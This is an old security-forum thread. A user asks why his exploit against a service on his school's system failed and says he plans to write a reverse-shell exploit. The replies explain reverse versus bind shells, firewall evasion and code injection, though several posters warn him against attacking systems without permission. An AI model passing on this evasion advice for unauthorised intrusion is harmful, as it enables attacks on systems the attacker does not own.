firewall and (POC)exploits
Results 1 to 8 of 8

Thread: firewall and (POC)exploits

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    Question firewall and (POC)exploits

    we all know about exploits.although i must accept there are a few matters involved that i never understood.
    say there is some bufferover flow in X server on port and we have a POC exploit for that too.
    that exploit is either supposed to send a shell a shell on a perticular ip address or bind shell to some port.
    we use that exploit and get into and vulnerable system.right?
    NOW i have sen sometimesthat although there is buiffer overflow that can be exploit in some services.but when i use exploit to get it doesn't work why?
    the exploitable service i was exploiting was running on a perticular port that i can't access anymore means it is down because of bufferoverflow caused by my exploit.
    that sytem is running network blackjack on port 1025.
    so my question is does firewall have to do anything with that?
    if yes then any system having a firewall is not vulnerable to exploits?(atleast POC exploits i know about DLL injection that can bypass firewall security)
    in my case when i exploit that perticular server shell is supposed to be bound on port XXXX but when i telnet to port XXXX i don't get anything although for sometime after i exploited that service port 1025 was busy(firewall port).wat does that mean?
    nobody is perfect i am nobody

  2. #2
    Banned
    Join Date
    Sep 2004
    Posts
    145
    I'm having trouble understanding you. I think the answer that your looking for is that you crashed the service (the overflow) and didn't manage to deliver a payload (shell). This would tend to mean bad exploit.


    Can you try to clarify a bit?

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Well littlenick,

    You should be doing this sort of thing on your own systems that you have exclusive use of. Then YOU are in control of the experiment (environment, changes and so on).

    If this is someone else's system, or is shared .............

    1. You should not be doing it
    2. They probably applied a few patches

    Remember an exploit takes advantage of a vulnerability.................once the vulnerability is patched, the exploit won't work. Also there is the concept of multi-layered security?

    Or, as Winston correctly observed, the "exploit" was a load of crap in the first place

    You really must be careful asking these sorts of questions on this site.........you almost came across as a skiddie asking for a copy of subseven

    Cheers

  4. #4
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    When coding exploits a skilled hacker can easily craft any type of payload he wishes to be delivered on succesful exploitation. Honestly in Win32 shells are not near as useful as on a *nix box, but if you just wanted to get through the firewall, a simple way would be to use a "reverse shell" (start a session on the victim and actually connect back OUT to the attacker, even if some outgoing connections are blocked, port 80 is almost always useable) shell code instead of a "bind shell" (Where we bind our shell and listen). Of course there are many more subltle things to do like replace .dlls or add accounts that are probably more effective on Windows. As to your exploit not working because the service crashed,that is one of the reasons Win shellcode can also be a bit tricky. Even though your payload may have exploited the service and spawned a shell, since you crashed the service(the parent process under which your exploit is running) down goes your shell with it. It is possible to avoid this, one way is by making your exploit force the app to exit cleanly but thats by no means the only way.



    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

  5. #5
    Senior Member
    Join Date
    Jun 2003
    Posts
    772
    tleast POC exploits i know about DLL injection that can bypass firewall security)
    Dll injection is for bypassing outbound detection. It is also annoying because of the external dll. Raw code injection is thus a better way to bypass outbound detection (see latest phrack).

    Win shellcode can also be a bit tricky
    *shivers*
    *el-half thinks it's annoying that dll export addresses change so often in new versions*
    *el-half sucks in writing generic shellcode*
    *el-half sues Microsoft for that*
    The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me

    www.elhalf.com

  6. #6
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    i am sorry nihil but i had to do it see it is my schools site and all i want to do is to inform them of a security bug they won't take me seriously if i don't have a proof.
    I hope u understand anyways after reading these three replys i have decided to make my own reverse shell exploit for this( i am not good at that but atleast i will try to do so).
    I never got an understanding of shell codes but i don't want to look stupid anymore.
    nobody is perfect i am nobody

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    littlenick,

    i am sorry nihil but i had to do it see it is my schools site and all i want to do is to inform them of a security bug they won't take me seriously if i don't have a proof.
    They will take you seriously enough when they catch you..............think about it If you do not have permission, don't do it.

    You will not be thanked for exposing someone elses inadequacies, believe me!

    From the general tone of your posts in this thread I get the impression that you are not totally familiar with the procedures involved, and certainly don't know what defences you are up against. That is a recipe for disaster.

    Well, that's my advice anyway.

  8. #8
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    As much as I hate to side with the thought police, I have to say, if you're doing this to your schools computer you are a total jackass. No one is going to give you a medal, just expel you and take you to court,.

    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •